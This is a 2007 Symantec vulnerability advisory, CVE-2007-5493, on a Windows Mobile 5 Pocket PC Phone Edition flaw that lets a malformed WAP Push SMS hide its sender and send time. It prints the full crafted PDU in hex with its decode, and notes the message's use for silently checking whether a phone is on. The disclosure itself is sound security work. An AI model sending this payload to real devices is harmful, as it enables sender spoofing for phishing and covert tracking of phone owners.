|
-----BEGIN PGP SIGNED MESSAGE-----=0D
Hash: SHA1=0D
=0D
=0D
=0D
Symantec Vulnerability Research=0D
http://www.symantec.com/research=0D
Security Advisory=0D
=0D
Advisory ID: SYMSA-2007-011=0D
Advisory Title: Microsoft Windows Mobile 5 PocketPC Phone Edition=0D
SMS Handler Issue With Regard to Malformed WAP Push=0D
Messages Hiding Source=0D
Author: Ollie Whitehouse / ollie_whitehouse@symantec.com=0D
Release Date: 17-10-2007=0D
Application: Microsoft Windows Mobile 5 PocketPC=0D
Platform: Windows=0D
Severity: Information Disclosure=0D
Vendor status: Vendor Reviewed=0D
CVE Number: CVE-2007-5493=0D
Reference: http://www.securityfocus.com/bid/26019=0D
=0D
=0D
Overview:=0D
=0D
Microsoft Windows Mobile 6 is the latest version of Microsoft's=0D
mobile operating system. Designed for small embedded devices,=0D
Windows Mobile is the CE feature set designed for PDA's and mobile=0D
telephones. Microsoft Windows Mobile comes in three distinct=0D
flavors, Pocket PC, Pocket PC Phone Edition and SmartPhone=0D
=0D
A vulnerability has been discovered in the SMS handler on=0D
Windows Mobile 2005 Pocket PC Phone edition which means the sender=0D
of the original SMS message can be masked from the recipient when=0D
sent a specifically crafted WAP PUSH message.=0D
=0D
=0D
Details:=0D
=0D
Symantec discovered that a slightly malformed WAP PUSH message=0D
could be used to hide the originating sender of the message on=0D
Windows Mobile 2005. The original PDU can be seen in [1]. The=0D
following PDU will cause the Pocket PC Phone edition SMS handler=0D
to incorrectly decode the PDU. The result of which is both the=0D
sending telephone number and the sending time are incorrect.=0D
=0D
[1] PDU (Line wrapped)=0D
079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA=0D
AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62=0D
756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62=0D
696C652E636F6D000101=0D
=0D
The decode of the PDU can be seen in [2]. This decode was achieved=0D
with PDUSpy from http://www.nobbi.com/pduspy.htm. When this message=0D
is received by a SmartPhone it will be silently discarded, which=0D
can also be useful to an attacker who wishes to ascertain if a=0D
cellphone is on without alerting the user through SMS delivery=0D
receipts.=0D
=0D
[2] Decode of PDU from PDUSpy=0D
=0D
PDU LENGTH IS 118 BYTES=0D
ADDRESS OF DELIVERING SMSC=0D
NUMBER IS : +447785016005=0D
TYPE OF NR. : International=0D
NPI : ISDN/Telephone (E.164/163)=0D
=0D
MESSAGE HEADER FLAGS=0D
MESSAGE TYPE : SMS SUBMIT=0D
REJECT DUPLICATES : NO=0D
VALIDITY PERIOD : RELATIVE=0D
REPLY PATH : NO=0D
USER DATA HEADER : PRESENT=0D
REQ. STATUS REPORT : NO=0D
MSG REFERENCE NR. : 34 (0x22)=0D
=0D
DESTINATION ADDRESS=0D
NUMBER IS : +447716299660=0D
TYPE OF NR. : International=0D
NPI : ISDN/Telephone (E.164/163)=0D
=0D
PROTOCOL IDENTIFIER (0x00)=0D
MESSAGE ENTITIES : SME-to-SME=0D
PROTOCOL USED : Implicit / SC-specific=0D
=0D
DATA CODING SCHEME (0x04)=0D
AUTO-DELETION : OFF=0D
COMPRESSION : OFF=0D
MESSAGE CLASS : NONE=0D
ALPHABET USED : 8bit data=0D
=0D
VALIDITY OF MESSAGE : 24.0 hrs=0D
=0D
USER DATA PART OF SM=0D
USER DATA LENGTH : 96 octets=0D
UDH LENGTH : 6 octets=0D
UDH : 05 04 0B 84 23 F0=0D
UDH ELEMENTS : 05 - Appl. port addressing 16bit=0D
4 (0x04) Bytes Information Element=0D
09200 : SOURCE port is: allocated by IANA=0D
02948 : DESTINATION port is: allocated by IANA=0D
--- DATA ----------------------=0D
05 04 0B 84 23 F0=0D
USER DATA (TEXT) : %=AE=81=EA=AF=82=B4=84jE=C6=0D
symantec=85Symantec=0D
bulkSMS (Unregistered Ver) -=0D
LogixMobile.com=0D
=0D
=0D
=0D
Vendor Response:=0D
=0D
A vulnerability has been discovered in the SMS handler. If a=0D
malicious message with no sender was received by a user on their=0D
device, the user may be enticed in taking action or clicking the=0D
URI that could lead to a second order attack.=0D
=0D
Mitigating Factors: By default Windows mobile device policy require=0D
SI messages to be authenticated. The Mobile Operators have the=0D
ability to change the policy to not requiring authentication in=0D
order for 3rd party ring tones and other SI messages.=0D
=0D
Microsoft will look into a different architecture in future versions.=0D
=0D
=0D
Recommendation:=0D
=0D
Contact your mobile operator to ensure the proper policy is set on=0D
your device.=0D
=0D
=0D
Common Vulnerabilities and Exposures (CVE) Information:=0D
=0D
The Common Vulnerabilities and Exposures (CVE) project has assigned =0D
the following names to these issues. These are candidates for =0D
inclusion in the CVE list (http://cve.mitre.org), which standardizes =0D
names for security problems.=0D
=0D
=0D
CVE-2007-5493=0D
=0D
- -------Symantec Vulnerability Research Advisory Information-------=0D
=0D
For questions about this advisory, or to report an error:=0D
research@symantec.com=0D
=0D
For details on Symantec's Vulnerability Reporting Policy: =0D
http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf=0D
=0D
Symantec Vulnerability Research Advisory Archive: =0D
http://www.symantec.com/research/ =0D
=0D
Symantec Vulnerability Research GPG Key:=0D
http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc=0D
=0D
- -------------Symantec Product Advisory Information-------------=0D
=0D
To Report a Security Vulnerability in a Symantec Product:=0D
secure@symantec.com =0D
=0D
For general information on Symantec's Product Vulnerability =0D
reporting and response:=0D
http://www.symantec.com/security/=0D
=0D
Symantec Product Advisory Archive: =0D
http://www.symantec.com/avcenter/security/SymantecAdvisories.html=0D
=0D
Symantec Product Advisory PGP Key:=0D
http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc=0D
=0D
- ---------------------------------------------------------------=0D
=0D
Copyright (c) 2007 by Symantec Corp.=0D
Permission to redistribute this alert electronically is granted =0D
as long as it is not edited in any way unless authorized by =0D
Symantec Consulting Services. Reprinting the whole or part of =0D
this alert in any medium other than electronically requires =0D
permission from research@symantec.com.=0D
=0D
Disclaimer=0D
The information in the advisory is believed to be accurate at the =0D
time of publishing based on currently available information. Use =0D
of the information constitutes acceptance for use in an AS IS =0D
condition. There are no warranties with regard to this information. =0D
Neither the author nor the publisher accepts any liability for any =0D
direct, indirect, or consequential loss or damage arising from use =0D
of, or reliance on, this information.=0D
=0D
Symantec, Symantec products, and Symantec Consulting Services are =0D
registered trademarks of Symantec Corp. and/or affiliated companies =0D
in the United States and other countries. All other registered and =0D
unregistered trademarks represented in this document are the sole =0D
property of their respective companies/owners.=0D
-----BEGIN PGP SIGNATURE-----=0D
Version: GnuPG v1.4.7 (MingW32)=0D
=0D
iD8DBQFHFlXzuk7IIFI45IARAk+NAKCk8GGaxtg7Z9g0zBTX8BzHt9LPkwCgwOeD=0D
1qhcVHQ07YHEdgF0zUP81/k==0D
=pFeF=0D
-----END PGP SIGNATURE-----=0D